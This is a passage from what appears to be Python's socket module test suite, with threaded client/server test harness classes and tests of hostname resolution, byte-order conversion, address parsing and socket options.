self.__tearDown = self.tearDown
self.setUp = self._setUp
self.tearDown = self._tearDown
def serverExplicitReady(self):
"""This method allows the server to explicitly indicate that
it wants the client thread to proceed. This is useful if the
server is about to execute a blocking routine that is
dependent upon the client thread during its setup routine."""
self.server_ready.set()
def _setUp(self):
self.wait_threads = support.wait_threads_exit()
self.wait_threads.__enter__()
self.server_ready = threading.Event()
self.client_ready = threading.Event()
self.done = threading.Event()
self.queue = queue.Queue(1)
self.server_crashed = False
# Do some munging to start the client test.
methodname = self.id()
i = methodname.rfind('.')
methodname = methodname[i+1:]
test_method = getattr(self, '_' + methodname)
self.client_thread = thread.start_new_thread(
self.clientRun, (test_method,))
try:
self.__setUp()
except:
self.server_crashed = True
raise
finally:
self.server_ready.set()
self.client_ready.wait()
def _tearDown(self):
self.__tearDown()
self.done.wait()
self.wait_threads.__exit__(None, None, None)
if self.queue.qsize():
exc = self.queue.get()
raise exc
def clientRun(self, test_func):
self.server_ready.wait()
try:
self.clientSetUp()
except BaseException as e:
self.queue.put(e)
self.clientTearDown()
return
finally:
self.client_ready.set()
if self.server_crashed:
self.clientTearDown()
return
if not hasattr(test_func, '__call__'):
raise TypeError("test_func must be a callable function")
try:
test_func()
except BaseException as e:
self.queue.put(e)
finally:
self.clientTearDown()
def clientSetUp(self):
raise NotImplementedError("clientSetUp must be implemented.")
def clientTearDown(self):
self.done.set()
thread.exit()
class ThreadedTCPSocketTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedUDPSocketTest(SocketUDPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedCANSocketTest(SocketCANTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketCANTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
try:
self.cli.bind((self.interface,))
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedRDSSocketTest(SocketRDSTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketRDSTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
try:
# RDS sockets must be bound explicitly to send or receive data
self.cli.bind((HOST, 0))
self.cli_addr = self.cli.getsockname()
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
@unittest.skipUnless(get_cid() != 2,
"This test can only be run on a virtual guest.")
class ThreadedVSOCKSocketStreamTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.serv.close)
self.serv.bind((socket.VMADDR_CID_ANY, VSOCKPORT))
self.serv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.serv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
time.sleep(0.1)
self.cli = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
cid = get_cid()
self.cli.connect((cid, VSOCKPORT))
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class SocketConnectedTest(ThreadedTCPSocketTest):
"""Socket tests for client-server connection.
self.cli_conn is a client socket connected to the server. The
setUp() method guarantees that it is connected to the server.
"""
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def setUp(self):
ThreadedTCPSocketTest.setUp(self)
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
ThreadedTCPSocketTest.tearDown(self)
def clientSetUp(self):
ThreadedTCPSocketTest.clientSetUp(self)
self.cli.connect((HOST, self.port))
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
ThreadedTCPSocketTest.clientTearDown(self)
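# Illustrative sketch of the pairing convention described in the ThreadableTest
# docstring: the server half is testEcho, the client half is _testEcho, and the
# threaded base class runs them concurrently. This is a hypothetical example,
# not one of the real tests in this module.
class DemoEchoTest(SocketConnectedTest):
    def testEcho(self):
        # Server portion: echo back whatever the client sends.
        data = self.cli_conn.recv(1024)
        self.cli_conn.sendall(data)
    def _testEcho(self):
        # Client portion: send MSG and expect it back unchanged.
        self.serv_conn.sendall(MSG)
        self.assertEqual(self.serv_conn.recv(1024), MSG)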
class SocketPairTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv, self.cli = socket.socketpair()
def tearDown(self):
self.serv.close()
self.serv = None
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
# The following classes are used by the sendmsg()/recvmsg() tests.
# Combining, for instance, ConnectedStreamTestMixin and TCPTestBase
# gives a drop-in replacement for SocketConnectedTest, but different
# address families can be used, and the attributes serv_addr and
# cli_addr will be set to the addresses of the endpoints.
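# A hypothetical illustration of such a combination (names invented here;
# the real combinations are defined further below):
#
#   class ExampleConnectedTCPTest(ConnectedStreamTestMixin, TCPTestBase):
#       pass
#
# behaves like SocketConnectedTest, but with serv_addr and cli_addr set and
# with the address family chosen by the *TestBase class that is mixed in.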
class SocketTestBase(unittest.TestCase):
"""A base class for socket tests.
Subclasses must provide methods newSocket() to return a new socket
and bindSock(sock) to bind it to an unused address.
Creates a socket self.serv and sets self.serv_addr to its address.
"""
def setUp(self):
self.serv = self.newSocket()
self.bindServer()
def bindServer(self):
"""Bind server socket and set self.serv_addr to its address."""
self.bindSock(self.serv)
self.serv_addr = self.serv.getsockname()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketListeningTestMixin(SocketTestBase):
"""Mixin to listen on the server socket."""
def setUp(self):
super().setUp()
self.serv.listen()
class ThreadedSocketTestMixin(ThreadSafeCleanupTestCase, SocketTestBase,
ThreadableTest):
"""Mixin to add client socket and allow client/server tests.
Client socket is self.cli and its address is self.cli_addr. See
ThreadableTest for usage information.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = self.newClientSocket()
self.bindClient()
def newClientSocket(self):
"""Return a new socket for use as client."""
return self.newSocket()
def bindClient(self):
"""Bind client socket and set self.cli_addr to its address."""
self.bindSock(self.cli)
self.cli_addr = self.cli.getsockname()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ConnectedStreamTestMixin(SocketListeningTestMixin,
ThreadedSocketTestMixin):
"""Mixin to allow client/server stream tests with connected client.
Server's socket representing connection to client is self.cli_conn
and client's connection to server is self.serv_conn. (Based on
SocketConnectedTest.)
"""
def setUp(self):
super().setUp()
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
super().tearDown()
def clientSetUp(self):
super().clientSetUp()
self.cli.connect(self.serv_addr)
self.serv_conn = self.cli
def clientTearDown(self):
try:
self.serv_conn.close()
self.serv_conn = None
except AttributeError:
pass
super().clientTearDown()
class UnixSocketTestBase(SocketTestBase):
"""Base class for Unix-domain socket tests."""
# This class is used for file descriptor passing tests, so we
# create the sockets in a private directory so that other users
# can't send anything that might be problematic for a privileged
# user running the tests.
def setUp(self):
self.dir_path = tempfile.mkdtemp()
self.addCleanup(os.rmdir, self.dir_path)
super().setUp()
def bindSock(self, sock):
path = tempfile.mktemp(dir=self.dir_path)
support.bind_unix_socket(sock, path)
self.addCleanup(support.unlink, path)
class UnixStreamBase(UnixSocketTestBase):
"""Base class for Unix-domain SOCK_STREAM tests."""
def newSocket(self):
return socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
class InetTestBase(SocketTestBase):
"""Base class for IPv4 socket tests."""
host = HOST
def setUp(self):
super().setUp()
self.port = self.serv_addr[1]
def bindSock(self, sock):
support.bind_port(sock, host=self.host)
class TCPTestBase(InetTestBase):
"""Base class for TCP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM)
class UDPTestBase(InetTestBase):
"""Base class for UDP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
class SCTPStreamBase(InetTestBase):
"""Base class for SCTP tests in one-to-one (SOCK_STREAM) mode."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_SCTP)
class Inet6TestBase(InetTestBase):
"""Base class for IPv6 socket tests."""
host = support.HOSTv6
class UDP6TestBase(Inet6TestBase):
"""Base class for UDP-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
# Test-skipping decorators for use with ThreadableTest.
def skipWithClientIf(condition, reason):
"""Skip decorated test if condition is true, add client_skip decorator.
If the decorated object is not a class, sets its attribute
"client_skip" to a decorator which will return an empty function
if the test is to be skipped, or the original function if it is
not. This can be used to avoid running the client part of a
skipped test when using ThreadableTest.
"""
def client_pass(*args, **kwargs):
pass
def skipdec(obj):
retval = unittest.skip(reason)(obj)
if not isinstance(obj, type):
retval.client_skip = lambda f: client_pass
return retval
def noskipdec(obj):
if not (isinstance(obj, type) or hasattr(obj, "client_skip")):
obj.client_skip = lambda f: f
return obj
return skipdec if condition else noskipdec
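# Sketch of the intended usage (hypothetical method names): the server-side
# test method takes the skip decorator and the client-side half reuses its
# client_skip attribute, so neither half runs when the condition holds:
#
#   @skipWithClientIf(condition, "reason")
#   def testFeature(self): ...
#   @testFeature.client_skip
#   def _testFeature(self): ...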
def requireAttrs(obj, *attributes):
"""Skip decorated test if obj is missing any of the given attributes.
Sets client_skip attribute as skipWithClientIf() does.
"""
missing = [name for name in attributes if not hasattr(obj, name)]
return skipWithClientIf(
missing, "don't have " + ", ".join(name for name in missing))
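# For instance, @requireAttrs(socket.socket, "sendmsg") skips a test (and,
# via client_skip, its client half) on builds whose sockets lack sendmsg();
# requireSocket() below works the same way for whole socket configurations,
# e.g. requireSocket("AF_UNIX", "SOCK_STREAM").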
def requireSocket(*args):
"""Skip decorated test if a socket cannot be created with given arguments.
When an argument is given as a string, will use the value of that
attribute of the socket module, or skip the test if it doesn't
exist. Sets client_skip attribute as skipWithClientIf() does.
"""
err = None
missing = [obj for obj in args if
isinstance(obj, str) and not hasattr(socket, obj)]
if missing:
err = "don't have " + ", ".join(name for name in missing)
else:
callargs = [getattr(socket, obj) if isinstance(obj, str) else obj
for obj in args]
try:
s = socket.socket(*callargs)
except OSError as e:
# XXX: check errno?
err = str(e)
else:
s.close()
return skipWithClientIf(
err is not None,
"can't create socket({0}): {1}".format(
", ".join(str(o) for o in args), err))
#######################################################################
## Begin Tests
class GeneralModuleTests(unittest.TestCase):
def test_SocketType_is_socketobject(self):
import _socket
self.assertTrue(socket.SocketType is _socket.socket)
s = socket.socket()
self.assertIsInstance(s, socket.SocketType)
s.close()
def test_repr(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with s:
self.assertIn('fd=%i' % s.fileno(), repr(s))
self.assertIn('family=%s' % socket.AF_INET, repr(s))
self.assertIn('type=%s' % socket.SOCK_STREAM, repr(s))
self.assertIn('proto=0', repr(s))
self.assertNotIn('raddr', repr(s))
s.bind(('127.0.0.1', 0))
self.assertIn('laddr', repr(s))
self.assertIn(str(s.getsockname()), repr(s))
self.assertIn('[closed]', repr(s))
self.assertNotIn('laddr', repr(s))
@unittest.skipUnless(_socket is not None, 'need _socket module')
def test_csocket_repr(self):
s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
try:
expected = ('<socket object, fd=%s, family=%s, type=%s, proto=%s>'
% (s.fileno(), s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
finally:
s.close()
expected = ('<socket object, fd=-1, family=%s, type=%s, proto=%s>'
% (s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
def test_weakref(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
p = proxy(s)
self.assertEqual(p.fileno(), s.fileno())
s.close()
s = None
try:
p.fileno()
except ReferenceError:
pass
else:
self.fail('Socket proxy still exists')
def testSocketError(self):
# Testing socket module exceptions
msg = "Error raising socket exception (%s)."
with self.assertRaises(OSError, msg=msg % 'OSError'):
raise OSError
with self.assertRaises(OSError, msg=msg % 'socket.herror'):
raise socket.herror
with self.assertRaises(OSError, msg=msg % 'socket.gaierror'):
raise socket.gaierror
def testSendtoErrors(self):
# Testing that sendto doesn't mask failures. See #10169.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind(('', 0))
sockname = s.getsockname()
# 2 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None)
        self.assertIn('not NoneType', str(cm.exception))
# 3 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, None)
self.assertIn('not NoneType', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 'bar', sockname)
self.assertIn('an integer is required', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None, None)
self.assertIn('an integer is required', str(cm.exception))
# wrong number of args
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo')
self.assertIn('(1 given)', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, sockname, 4)
self.assertIn('(4 given)', str(cm.exception))
def testCrucialConstants(self):
# Testing for mission critical constants
socket.AF_INET
socket.SOCK_STREAM
socket.SOCK_DGRAM
socket.SOCK_RAW
socket.SOCK_RDM
socket.SOCK_SEQPACKET
socket.SOL_SOCKET
socket.SO_REUSEADDR
def testHostnameRes(self):
# Testing hostname resolution mechanisms
hostname = socket.gethostname()
try:
ip = socket.gethostbyname(hostname)
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertTrue(ip.find('.') >= 0, "Error resolving host to ip.")
try:
hname, aliases, ipaddrs = socket.gethostbyaddr(ip)
except OSError:
# Probably a similar problem as above; skip this test
self.skipTest('name lookup failure')
all_host_names = [hostname, hname] + aliases
fqhn = socket.getfqdn(ip)
if not fqhn in all_host_names:
self.fail("Error testing host resolution mechanisms. (fqdn: %s, all: %s)" % (fqhn, repr(all_host_names)))
def test_host_resolution(self):
for addr in [support.HOSTv4, '10.0.0.1', '255.255.255.255']:
self.assertEqual(socket.gethostbyname(addr), addr)
# we don't test support.HOSTv6 because there's a chance it doesn't have
# a matching name entry (e.g. 'ip6-localhost')
for host in [support.HOSTv4]:
self.assertIn(host, socket.gethostbyaddr(host)[2])
def test_host_resolution_bad_address(self):
# These are all malformed IP addresses and expected not to resolve to
# any result. But some ISPs, e.g. AWS, may successfully resolve these
# IPs.
explanation = (
"resolving an invalid IP address did not raise OSError; "
"can be caused by a broken DNS server"
)
for addr in ['0.1.1.~1', '1+.1.1.1', '::1q', '::1::2',
'1:1:1:1:1:1:1:1:1']:
with self.assertRaises(OSError, msg=addr):
socket.gethostbyname(addr)
with self.assertRaises(OSError, msg=explanation):
socket.gethostbyaddr(addr)
@unittest.skipUnless(hasattr(socket, 'sethostname'), "test needs socket.sethostname()")
@unittest.skipUnless(hasattr(socket, 'gethostname'), "test needs socket.gethostname()")
def test_sethostname(self):
oldhn = socket.gethostname()
try:
socket.sethostname('new')
except OSError as e:
if e.errno == errno.EPERM:
self.skipTest("test should be run as root")
else:
raise
try:
# running test as root!
self.assertEqual(socket.gethostname(), 'new')
# Should work with bytes objects too
socket.sethostname(b'bar')
self.assertEqual(socket.gethostname(), 'bar')
finally:
socket.sethostname(oldhn)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInterfaceNameIndex(self):
interfaces = socket.if_nameindex()
for index, name in interfaces:
self.assertIsInstance(index, int)
self.assertIsInstance(name, str)
# interface indices are non-zero integers
self.assertGreater(index, 0)
_index = socket.if_nametoindex(name)
self.assertIsInstance(_index, int)
self.assertEqual(index, _index)
_name = socket.if_indextoname(index)
self.assertIsInstance(_name, str)
self.assertEqual(name, _name)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInvalidInterfaceNameIndex(self):
# test nonexistent interface index/name
self.assertRaises(OSError, socket.if_indextoname, 0)
self.assertRaises(OSError, socket.if_nametoindex, '_DEADBEEF')
# test with invalid values
self.assertRaises(TypeError, socket.if_nametoindex, 0)
self.assertRaises(TypeError, socket.if_indextoname, '_DEADBEEF')
@unittest.skipUnless(hasattr(sys, 'getrefcount'),
'test needs sys.getrefcount()')
def testRefCountGetNameInfo(self):
# Testing reference count for getnameinfo
try:
# On some versions, this loses a reference
orig = sys.getrefcount(__name__)
socket.getnameinfo(__name__,0)
except TypeError:
if sys.getrefcount(__name__) != orig:
self.fail("socket.getnameinfo loses a reference")
def testInterpreterCrash(self):
# Making sure getnameinfo doesn't crash the interpreter
try:
# On some versions, this crashes the interpreter.
socket.getnameinfo(('x', 0, 0, 0), 0)
except OSError:
pass
def testNtoH(self):
# This just checks that htons etc. are their own inverse,
# when looking at the lower 16 or 32 bits.
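        # For example, on a little-endian host socket.htons(0x1234) returns
        # 0x3412 and a second htons() call restores 0x1234; on a big-endian
        # host both calls are identity operations on 16-bit values.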
sizes = {socket.htonl: 32, socket.ntohl: 32,
socket.htons: 16, socket.ntohs: 16}
for func, size in sizes.items():
mask = (1<<size) - 1
for i in (0, 1, 0xffff, ~0xffff, 2, 0x01234567, 0x76543210):
self.assertEqual(i & mask, func(func(i&mask)) & mask)
swapped = func(mask)
self.assertEqual(swapped & mask, mask)
self.assertRaises(OverflowError, func, 1<<34)
@support.cpython_only
def testNtoHErrors(self):
import _testcapi
s_good_values = [0, 1, 2, 0xffff]
l_good_values = s_good_values + [0xffffffff]
l_bad_values = [-1, -2, 1<<32, 1<<1000]
s_bad_values = l_bad_values + [_testcapi.INT_MIN - 1,
_testcapi.INT_MAX + 1]
s_deprecated_values = [1<<16, _testcapi.INT_MAX]
for k in s_good_values:
socket.ntohs(k)
socket.htons(k)
for k in l_good_values:
socket.ntohl(k)
socket.htonl(k)
for k in s_bad_values:
self.assertRaises(OverflowError, socket.ntohs, k)
self.assertRaises(OverflowError, socket.htons, k)
for k in l_bad_values:
self.assertRaises(OverflowError, socket.ntohl, k)
self.assertRaises(OverflowError, socket.htonl, k)
for k in s_deprecated_values:
self.assertWarns(DeprecationWarning, socket.ntohs, k)
self.assertWarns(DeprecationWarning, socket.htons, k)
def testGetServBy(self):
eq = self.assertEqual
# Find one service that exists, then check all the related interfaces.
# I've ordered this by protocols that have both a tcp and udp
# protocol, at least for modern Linuxes.
if (sys.platform.startswith(('freebsd', 'netbsd', 'gnukfreebsd'))
or sys.platform in ('linux', 'darwin')):
            # avoid the 'echo' service on this platform, as there is an
            # assumption-breaking non-standard port/protocol entry
services = ('daytime', 'qotd', 'domain')
else:
services = ('echo', 'daytime', 'domain')
for service in services:
try:
port = socket.getservbyname(service, 'tcp')
break
except OSError:
pass
else:
raise OSError
# Try same call with optional protocol omitted
# Issue #26936: Android getservbyname() was broken before API 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
port2 = socket.getservbyname(service)
eq(port, port2)
# Try udp, but don't barf if it doesn't exist
try:
udpport = socket.getservbyname(service, 'udp')
except OSError:
udpport = None
else:
eq(udpport, port)
# Now make sure the lookup by port returns the same service name
# Issue #26936: Android getservbyport() is broken.
if not support.is_android:
eq(socket.getservbyport(port2), service)
eq(socket.getservbyport(port, 'tcp'), service)
if udpport is not None:
eq(socket.getservbyport(udpport, 'udp'), service)
# Make sure getservbyport does not accept out of range ports.
self.assertRaises(OverflowError, socket.getservbyport, -1)
self.assertRaises(OverflowError, socket.getservbyport, 65536)
def testDefaultTimeout(self):
# Testing default timeout
# The default timeout should initially be None
self.assertEqual(socket.getdefaulttimeout(), None)
s = socket.socket()
self.assertEqual(s.gettimeout(), None)
s.close()
# Set the default timeout to 10, and see if it propagates
with socket_setdefaulttimeout(10):
self.assertEqual(socket.getdefaulttimeout(), 10)
with socket.socket() as sock:
self.assertEqual(sock.gettimeout(), 10)
# Reset the default timeout to None, and see if it propagates
socket.setdefaulttimeout(None)
self.assertEqual(socket.getdefaulttimeout(), None)
with socket.socket() as sock:
self.assertEqual(sock.gettimeout(), None)
# Check that setting it to an invalid value raises ValueError
self.assertRaises(ValueError, socket.setdefaulttimeout, -1)
# Check that setting it to an invalid type raises TypeError
self.assertRaises(TypeError, socket.setdefaulttimeout, "spam")
@unittest.skipUnless(hasattr(socket, 'inet_aton'),
'test needs socket.inet_aton()')
def testIPv4_inet_aton_fourbytes(self):
# Test that issue1008086 and issue767150 are fixed.
# It must return 4 bytes.
self.assertEqual(b'\x00'*4, socket.inet_aton('0.0.0.0'))
self.assertEqual(b'\xff'*4, socket.inet_aton('255.255.255.255'))
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv4toString(self):
from socket import inet_aton as f, inet_pton, AF_INET
g = lambda a: inet_pton(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual(b'\x00\x00\x00\x00', f('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', f('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', f('170.170.170.170'))
self.assertEqual(b'\x01\x02\x03\x04', f('1.2.3.4'))
self.assertEqual(b'\xff\xff\xff\xff', f('255.255.255.255'))
# bpo-29972: inet_pton() doesn't fail on AIX
if not sys.platform.startswith('aix'):
assertInvalid(f, '0.0.0.')
assertInvalid(f, '300.0.0.0')
assertInvalid(f, 'a.0.0.0')
assertInvalid(f, '1.2.3.4.5')
assertInvalid(f, '::1')
self.assertEqual(b'\x00\x00\x00\x00', g('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', g('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', g('170.170.170.170'))
self.assertEqual(b'\xff\xff\xff\xff', g('255.255.255.255'))
assertInvalid(g, '0.0.0.')
assertInvalid(g, '300.0.0.0')
assertInvalid(g, 'a.0.0.0')
assertInvalid(g, '1.2.3.4.5')
assertInvalid(g, '::1')
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv6toString(self):
try:
from socket import inet_pton, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_pton(AF_INET6, '::')
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_pton(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual(b'\x00' * 16, f('::'))
self.assertEqual(b'\x00' * 16, f('0::0'))
self.assertEqual(b'\x00\x01' + b'\x00' * 14, f('1::'))
self.assertEqual(
b'\x45\xef\x76\xcb\x00\x1a\x56\xef\xaf\xeb\x0b\xac\x19\x24\xae\xae',
f('45ef:76cb:1a:56ef:afeb:bac:1924:aeae')
)
self.assertEqual(
b'\xad\x42\x0a\xbc' + b'\x00' * 4 + b'\x01\x27\x00\x00\x02\x54\x00\x02',
f('ad42:abc::127:0:254:2')
)
self.assertEqual(b'\x00\x12\x00\x0a' + b'\x00' * 12, f('12:a::'))
assertInvalid('0x20::')
assertInvalid(':::')
assertInvalid('::0::')
assertInvalid('1::abc::')
assertInvalid('1::abc::def')
assertInvalid('1:2:3:4:5:6')
assertInvalid('1:2:3:4:5:6:7:8:0')
# bpo-29972: inet_pton() doesn't fail on AIX
if not sys.platform.startswith('aix'):
assertInvalid('1:2:3:4:5:6:')
assertInvalid('1:2:3:4:5:6:7:8:')
self.assertEqual(b'\x00' * 12 + b'\xfe\x2a\x17\x40',
f('::254.42.23.64')
)
self.assertEqual(
b'\x00\x42' + b'\x00' * 8 + b'\xa2\x9b\xfe\x2a\x17\x40',
f('42::a29b:254.42.23.64')
)
self.assertEqual(
b'\x00\x42\xa8\xb9\x00\x00\x00\x02\xff\xff\xa2\x9b\xfe\x2a\x17\x40',
f('42:a8b9:0:2:ffff:a29b:254.42.23.64')
)
assertInvalid('255.254.253.252')
assertInvalid('1::260.2.3.0')
assertInvalid('1::0.be.e.0')
assertInvalid('1:2:3:4:5:6:7:1.2.3.4')
assertInvalid('::1.2.3.4:0')
assertInvalid('0.100.200.0:3:4:5:6:7:8')
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv4(self):
from socket import inet_ntoa as f, inet_ntop, AF_INET
g = lambda a: inet_ntop(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual('1.0.1.0', f(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', f(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', f(b'\xff\xff\xff\xff'))
self.assertEqual('1.2.3.4', f(b'\x01\x02\x03\x04'))
assertInvalid(f, b'\x00' * 3)
assertInvalid(f, b'\x00' * 5)
assertInvalid(f, b'\x00' * 16)
self.assertEqual('170.85.170.85', f(bytearray(b'\xaa\x55\xaa\x55')))
self.assertEqual('1.0.1.0', g(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', g(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', g(b'\xff\xff\xff\xff'))
assertInvalid(g, b'\x00' * 3)
assertInvalid(g, b'\x00' * 5)
assertInvalid(g, b'\x00' * 16)
self.assertEqual('170.85.170.85', g(bytearray(b'\xaa\x55\xaa\x55')))
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv6(self):
try:
from socket import inet_ntop, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_ntop(AF_INET6, b'\x00' * 16)
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_ntop(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual('::', f(b'\x00' * 16))
self.assertEqual('::1', f(b'\x00' * 15 + b'\x01'))
self.assertEqual(
'aef:b01:506:1001:ffff:9997:55:170',
f(b'\x0a\xef\x0b\x01\x05\x06\x10\x01\xff\xff\x99\x97\x00\x55\x01\x70')
)
self.assertEqual('::1', f(bytearray(b'\x00' * 15 + b'\x01')))
assertInvalid(b'\x12' * 15)
assertInvalid(b'\x12' * 17)
assertInvalid(b'\x12' * 4)
# XXX The following don't test module-level functionality...
def testSockName(self):
# Testing getsockname()
port = support.find_unused_port()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.bind(("0.0.0.0", port))
name = sock.getsockname()
        # XXX(nnorwitz): http://tinyurl.com/os5jz seems to indicate that it
        # is reasonable to get the host's addr in addition to 0.0.0.0, at
        # least for eCos.  This is required for the S/390 to pass.
try:
my_ip_addr = socket.gethostbyname(socket.gethostname())
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertIn(name[0], ("0.0.0.0", my_ip_addr), '%s invalid' % name[0])
self.assertEqual(name[1], port)
def testGetSockOpt(self):
# Testing getsockopt()
        # A new socket should start with SO_REUSEADDR unset (reuse == 0)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse != 0, "initial mode is reuse")
def testSetSockOpt(self):
# Testing setsockopt()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
